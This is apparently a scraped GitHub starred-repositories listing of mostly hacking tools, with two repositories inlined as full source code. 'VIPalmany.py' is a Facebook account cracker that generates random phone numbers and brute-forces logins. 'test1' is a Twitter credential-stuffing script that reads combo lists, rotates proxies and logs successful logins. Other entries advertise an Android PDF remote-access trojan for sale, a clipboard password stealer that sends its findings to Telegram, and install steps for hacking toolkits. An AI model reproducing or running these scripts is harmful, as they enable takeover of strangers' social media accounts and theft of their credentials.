Maddmaxxxex's starred repositories
Gemail-Hack
python script for Hack gmail account brute force
urh-cc1101_FEC_encode_decode_plugin
Universal Radio Hacker (urh) plugin to decode cc1101 messages, which uses the cc1101 FEC (forward error correction) feature
VIPalmany.py
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass os.system('rm -rf .txt') for n in range(5999): nmbr = random.randint(1111111, 9999999) sys.stdout = open('.txt', 'a') print nmbr sys.stdout.flush() try: import requests except ImportError: os.system('pip2 install requests') try: import mechanize except ImportError: os.system('pip2 install mechanize') time.sleep(1) os.system('python2 nmbr.py') from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')] def exb(): print '[!] Exit' os.sys.exit() def psb(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.03) def t(): time.sleep(1) def cb(): os.system('clear') logo = logo =""" \n\x1b[1;33mMY TELEGRAM:@i4m_ALMANY \n\x1b[1;33mMY CHANALE:@russi_chanal \033[33mtkaya gar edit dakayt ba nawman la gal bet \033[33toolaka ba xati korak zor sariha tool frea tkaya may frosha """ print("____________________________") back = 0 successful = [] cpb = [] oks = [] id = [] listgrup = [] vulnot = "\033[97mNot Vuln" vuln = "\033[97mVuln" os.system("clear") def menu(): os.system('clear') print logo print 42 * '\x1b[1;33m-' print '[1]Cracker ' print '[2] IRAQ' print '[0]BACK ' print ' ' print 42 * '\x1b[1;33m-' action() def action(): global cpb global oks bch = raw_input('\n\x1b[1;33mhalbzhera \x1b[1;97m>>>\x1b[1;90m ') if bch == '': print '[!] Fill in correctly' action() elif bch == '1': os.system('clear') print logo os.system os.system("figlet ASHNA") os.system("figlet HACKER") print ('\x1b[1;33m750 770 751 771') try: c = raw_input('\x1b[1;33m halbzhera : ') k = '+964' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '2': os.system('clear') print logo print '750- 751 - 752 - 770 - 771 - 772 - 780 - 781 - 782 - 783' try: c = raw_input(' halbzhera: ') k = '+964' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == 'F': os.system('clear') print logo print '\x1b[1;91m 14, 19' try: c = raw_input(' choose code : ') k = '+80' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '0': exb() else: print '[!] Fill in correctly' action() xxx = str(len(id)) psb('[\xe2\x9c\x93] raqam: ' + xxx) time.sleep(0.1) psb('\x1b[1;92m[\xe2\x9c\x93]\x1b[1;92m crack daste pekrd ...') time.sleep(0.1) psb('[!] bo wastan dne tool CTRL+z') time.sleep(0.5) print 42 * '\x1b[1;91m=' def main(dla): user = dla try: os.mkdir('save') except OSError: pass try: pass1 = user data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[HACK by ALMANY]\x1b[1;92m ' + k + c + user + ' | ' + pass1 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass1 + '\n') okb.close() oks.append(c + user + pass1) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[Check-point]\x1b[1;97m ' + k + c + user + ' | ' + pass1 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '>>>' + pass1 + '\n') cps.close() cpb.append(c + user + pass1) except: pass p = ThreadPool(30) p.map(main, id) print 42 * '\x1b[1;97m=' print '[\xe2\x9c\x93]\x1b[1;93m Process Has Been Completed ....' print '[\xe2\x9c\x93]\x1b[1;92m Total OK/\x1b[1;97mCP : ' + str(len(oks)) + '/' + str(len(cpb)) print '[\xe2\x9c\x93]\x1b[1;97m CP File Has Been Saved : save/checkpoint.txt' raw_input('\n[Press Enter To Go Back]') os.system('python2 .README.md') if __name__ == '__main__': menu()
Hackey-Linux
This repo contains a variety of projects, including college-level code, ethical hacking, web development, and Telegram bots. Explore and contribute to showcase unique skills and knowledge in different areas of coding and development.
Financial-chat-bot
Skoltech Hack Lab project. Introducing telegram chat bot with voice interaction which helps to learn how to manage finances and how to invest in the form of the game.
HACK-YEMEN
## Now you can download the most powerful tools using this simple script ### Screenshot ![Screen](http://www.m9c.net/uploads/15563553591.jpg) ### Installations ``` git clone https://github.com/king-hacking/King-Hacking.git cd King-Hacking bash King-Tools.sh ``` ### My Accounts * [TELEGRAM](https://t.me/hackeer1) * [FACEBOOK](https://www.facebook.com/king.hacking.sy) * [INSTAGRAM](https://instagram.com/king1hacking)
TeleMsg-Frontend
Frontend of TeleMsg, a telegram message sheduler for the Hack&Roll 2024 Hackathon.
HackingBooks
here is the largest collection of hacking and pentesting books, for all my dudes who cant afford to buy them! feel free to join my Telegram Channel https://t.me/sudosuraz
hackchat-telegram-bridge
Impersonating bridge between hack.chat and Telegram
Hacking-Directory
Lists of hacking: Blog, Forums, Telegram channel and all kind of resources in spanish and english.
Telegram-Hacking
Telegram hacking tool
Telegram-Bot-Hacking
hacking tool based on Bot telegram
Hack-Telegram
Telegram Account Hacking or Cloning Latest Tool
test1
from time import sleep import os,random try: import requests except: os.system('pip install requests') import requests try: from colorama import Fore,Style except: os.system('pip install colorama') from colorama import Fore,Style try: os.system('color') except: pass R = Fore.RED G = Fore.GREEN Y = Fore.YELLOW os.system('cls' if os.name == 'nt' else 'clear') hunt = 0 error = 0 bad = 0 banner = (G+""" \033[1;92m \033[1;97m------------------------------------------------------ TELEGRAM CHANEEL : @HACKFACBOOK2 TELEGRAM : @bekashacker HACK BY @bekashacker \033[1;97m--------------------------------------------------------------- """) print(banner) def Guess_without_proxies(user,pasw): global hunt,error,bad,banner try: print(Y+f'[-] {user}:{pasw}') token_url = 'https://api.twitter.com/1.1/guest/activate.json' token_hed = { 'User-Agent': 'TwitterAndroid/8.87.0-release.01 (28870001-r-1) SM-G935F/7.1.2 (samsung;SM-G935F;samsung;SM-G935F;0;;1;2012)', 'Authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAAFXzAwAAAAAAMHCxpeSDG1gLNLghVe8d74hl6k4%3DRUMF4xAQLsbeBhTSRrCiQpJtxoGWeyHrDb5te2jpGskWDFW82F', } get_token = requests.post(token_url,headers=token_hed).json()['guest_token'] url = "https://api.twitter.com/auth/1/xauth_password.json" head = { 'Cache-Control': 'no-store', 'X-B3-TraceId': 'bc35545e2885cf69', 'OS-Security-Patch-Level': '2017-10-05', 'X-Twitter-Client-Flavor': '', 'User-Agent': 'TwitterAndroid/8.87.0-release.01 (28870001-r-1) SM-G935F/7.1.2 (samsung;SM-G935F;samsung;SM-G935F;0;;1;2012)', 'Accept-Encoding': 'gzip, deflate', 'X-Twitter-Client-AdID': '143f8c1d-0dab-495e-bdba-6b8f3216d92f', 'Timezone': 'Asia/Shanghai', 'X-Twitter-Client-Limit-Ad-Tracking': '0', 'X-Twitter-Client-DeviceID': 'c0575264c704f9c6', 'X-Twitter-Client': 'TwitterAndroid', 'X-Twitter-Client-Language': 'ar-EG', 'X-Twitter-API-Version': '5', 'att': '1-p8YDwE1eClUMxxzR8MHgZpnUFyhpILYjFUzExuRI', 'Optimize-Body': 'true', 'X-Twitter-Active-User': 'yes', 'X-Twitter-Client-Version': '8.87.0-release.01', 'X-Guest-Token': f'{get_token}', 'X-Client-UUID': 'f55fe15f-b1f4-4406-9dd7-e0eb18b841ec', 'Accept': 'application/json', 'Authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAAFXzAwAAAAAAMHCxpeSDG1gLNLghVe8d74hl6k4%3DRUMF4xAQLsbeBhTSRrCiQpJtxoGWeyHrDb5te2jpGskWDFW82F', 'Accept-Language': 'ar-EG', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '140', 'Host': 'api.twitter.com', 'Connection': 'close', 'Cookie': 'personalization_id=v1_PV0kGHiFp5r175R1KzBEzg==; guest_id=v1%3A161752602861069129' } data = { 'x_auth_identifier': user, 'x_auth_password': pasw, 'send_error_codes':'true', 'x_auth_login_challenge':'1', 'x_auth_login_verification':'1', 'ui_metrics': '' } sleep(0.2) login = requests.post(url,headers=head,data=data).text if 'oauth_token' in login: with open('hunt.txt','a') as dd: dd.write(f'{user}:{pasw}\n') hunt +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') else: bad +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') except: error +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') def Guess_with_proxies(user,pasw): global hunt,error,bad,banner try: print(Y+f'[-] {user}:{pasw}') token_url = 'https://api.twitter.com/1.1/guest/activate.json' token_hed = { 'User-Agent': 'TwitterAndroid/8.87.0-release.01 (28870001-r-1) SM-G935F/7.1.2 (samsung;SM-G935F;samsung;SM-G935F;0;;1;2012)', 'Authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAAFXzAwAAAAAAMHCxpeSDG1gLNLghVe8d74hl6k4%3DRUMF4xAQLsbeBhTSRrCiQpJtxoGWeyHrDb5te2jpGskWDFW82F', } get_token = requests.post(token_url,headers=token_hed).json()['guest_token'] url = "https://api.twitter.com/auth/1/xauth_password.json" head = { 'Cache-Control': 'no-store', 'X-B3-TraceId': 'bc35545e2885cf69', 'OS-Security-Patch-Level': '2017-10-05', 'X-Twitter-Client-Flavor': '', 'User-Agent': 'TwitterAndroid/8.87.0-release.01 (28870001-r-1) SM-G935F/7.1.2 (samsung;SM-G935F;samsung;SM-G935F;0;;1;2012)', 'Accept-Encoding': 'gzip, deflate', 'X-Twitter-Client-AdID': '143f8c1d-0dab-495e-bdba-6b8f3216d92f', 'Timezone': 'Asia/Shanghai', 'X-Twitter-Client-Limit-Ad-Tracking': '0', 'X-Twitter-Client-DeviceID': 'c0575264c704f9c6', 'X-Twitter-Client': 'TwitterAndroid', 'X-Twitter-Client-Language': 'ar-EG', 'X-Twitter-API-Version': '5', 'att': '1-p8YDwE1eClUMxxzR8MHgZpnUFyhpILYjFUzExuRI', 'Optimize-Body': 'true', 'X-Twitter-Active-User': 'yes', 'X-Twitter-Client-Version': '8.87.0-release.01', 'X-Guest-Token': f'{get_token}', 'X-Client-UUID': 'f55fe15f-b1f4-4406-9dd7-e0eb18b841ec', 'Accept': 'application/json', 'Authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAAFXzAwAAAAAAMHCxpeSDG1gLNLghVe8d74hl6k4%3DRUMF4xAQLsbeBhTSRrCiQpJtxoGWeyHrDb5te2jpGskWDFW82F', 'Accept-Language': 'ar-EG', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '140', 'Host': 'api.twitter.com', 'Connection': 'close', 'Cookie': 'personalization_id=v1_PV0kGHiFp5r175R1KzBEzg==; guest_id=v1%3A161752602861069129' } data = { 'x_auth_identifier': user, 'x_auth_password': pasw, 'send_error_codes':'true', 'x_auth_login_challenge':'1', 'x_auth_login_verification':'1', 'ui_metrics': '' } prox = open('proxies.txt', 'r').read().splitlines() rprox = str(random.choice(prox)) proxies = {'http':'http://{}'.format(rprox), 'https':'https://{}'.format(rprox)} login = requests.post(url,headers=head,data=data,proxies=proxies,timeout=8).text if 'oauth_token' in login: with open('hunt.txt','a') as dd: dd.write(f'{user}:{pasw}\n') hunt +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') else: bad +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') except: error +=1 os.system('cls' if os.name == 'nt' else 'clear') print(f'{banner}\n[-] Hunt : {hunt}\n[-] Bad : {bad}\n[-] Error : {error}') action = input(Y+""" [1] CRACK BA PROXIES [2] CRACK BA PROXIES PRO [3] YAKYAN HALBZHERA : """) if action == '2': for acc in open('combo.txt','r').read().splitlines(): try: user = acc.split(':')[0] pasw = acc.split(':')[1] Guess_with_proxies(user,pasw) except: pass else: for account in open('combo.txt','r').read().splitlines(): try: user = account.split(':')[0] pasw = account.split(':')[1] Guess_without_proxies(user,pasw) except: pass
PRO
# hpro This is a python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password. # Installation termux-setup-storage <br> rm -rf hpro && rm -rf /sdcard/.hs.txt<br> apt update && apt upgrade apt install python2 apt install git apt install nodejs git clone https://github.com/Hamzahash/hpro.git # How to use cd hpro python2 hop.py # Note The owner is not responsible for any illegal use This github account donot represent or promote any illegal activity. Use this tool on your own risk. # Contact<br> <a href='https://facebook.com/mhamza1626'>Facebook</a> <br> <a href='https://t.me/hop1626'>Telegram</a>
security_checker
For educational purposes only! With this tool, you can check clipboard encryption. Other features are in the process of being added. This script allows you to extract the contents of the clipboard, checks whether it fits the password format and sends it to the Telegram messenger. Also, the time of using the password and the current ip address will be attached to the intercepted password. It is forbidden to use on other people's devices for the purpose of hacking. I am not responsible for any harm caused by this program. This project aims to show Windows users that using tools like "KeePass" without hygiene of the entire system is not a panacea.
androidPDF
The world's first and only android pdf rat! With this rat program, you can create a pdf rat and hack android users. - It works stably - Does not detect viruses - Custom pdf To purchase, please log in to my telegram channel and send me a message. https://t.me/doctypexs
awesome-wardriving
A curated list of awesome Hacking. Inspired by many other awesome-repositories. If you want to contribute to this list (please do), send me a pull request or contact me at telegram: @r4z0r5.
pearl-hacks-2022
An implementation of a screen time buddy for a workshop I hosted at Pearl Hacks 2022. Built and deployed using Python, Telegram, and Google Cloud.
Hack-Telegram
ابزار هک تلگرام با ارسال لینک - Hack telegram for send link
Telegram-Hack-Script
With This Script You Can Hack Any ID of Telegram!
TELEGRAM-HACK
Source of the truth simulation of Telegram password hack
prometheus-telegram-exporter
Quick hack to export telegram webhook metrics into prometheus
dewaa_store
*[DEWA_BOT]* *ʾ˖ ≡ MENU ' ָ࣪ ✦* ❏ ˖ֹ ⇢ ```#KERJA``` ❏ ˖ֹ ⇢ ```#P``` ❏ ˖ֹ ⇢ ```#jam``` ❏ ˖ֹ ⇢ ```#TRX``` ❏ ˖ֹ ⇢ ```#Testi``` ❏ ˖ֹ ⇢ ```#Jasa``` ❏ ˖ֹ ⇢ ```#Jasa hack``` *ʾ˖ ≡ ALL FITURE ' ָ࣪ ✦* ❏ ˖ֹ ⇢ ```APK HACK``` ❏ ˖ֹ ⇢ ```HACK ID``` ❏ ˖ֹ ⇢ ```HACKED ROOM``` ❏ ˖ֹ ⇢ ```ROWM HACK``` ❏ ˖ֹ ⇢ ```ANONYMOUS HYPER``` ❏ ˖ֹ ⇢ ```ROUMBLE HACK``` ❏ ˖ֹ ⇢ ```FB HACK``` ❏ ˖ֹ ⇢ ```TWITER HACK``` ❏ ˖ֹ ⇢ ```TELEGRAM HACK``` ❏ ˖ֹ ⇢ ```TIK TOK HACK NO PROBLEM``` ❏ ˖ֹ ⇢ ```CPSH HACK``` ❏ ˖ֹ ⇢ ```APN HACK``` ❏ ˖ֹ ⇢ ```TURBO HACK``` ❏ ˖ֹ ⇢ ```VPN HACK``` ❏ ˖ֹ ⇢ ```TGE HACK``` ❏ ˖ֹ ⇢ ```ID ML HACK``` ❏ ˖ֹ ⇢ ```ID FF HACK``` ❏ ˖ֹ ⇢ ```ID AOV HACK``` ❏ ˖ֹ ⇢ ```ID VALORANT HACK``` ❏ ˖ֹ ⇢ ```ID PUBG HACK``` ❏ ˖ֹ ⇢ ```ID COMCANT``` ⇢*___________________* ❏ ˖ֹ ⇢ ```TACTIHACK``` ❏ ˖ֹ ⇢ ```ID COMAND``` ❏ ˖ֹ ⇢ ```MO USAGE``` ❏ ˖ֹ ⇢ ```ID ROOLING``` ❏ ˖ֹ ⇢ ```ID SAUSAGE MAN P1``` ❏ ˖ֹ ⇢ ```TOOLKIT HACK``` ❏ ˖ֹ ⇢ ```RIMURU HACK``` ❏ ˖ֹ ⇢ ```TEE HACK``` ❏ ˖ֹ ⇢ ```YAA HACK``` ❏ ˖ֹ ⇢ ```NEO HACK``` * MY PARTNERS* ☆>>>>>>>>>>>>>>>☆ DEWAA HACK. 《<<<<<<<<<<<<<<<》 YAYAA HACK. 《>>>>>>>>>>>>>>>》 NEO HACK 《<<<<<<<<<<<<<<<》 ⇢*OPEN MURID R 20k DI AJARIN SEBISA/FULL VIDEO* SYSTEM:TF-HACK-JEBOL-KASIH TTL-DONE GA JEBOL REFF FULL^ http://wa.me/6283195558461 *ʾ˖ ≡ DLL ALL FITURE' ָ࣪ ✦*
vulnx
vulnx 🕷️ an intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system. It can perform a quick CMS security detection, information collection (including sub-domain name, ip address, country information, organizational information and time zone, etc.) and vulnerability scanning.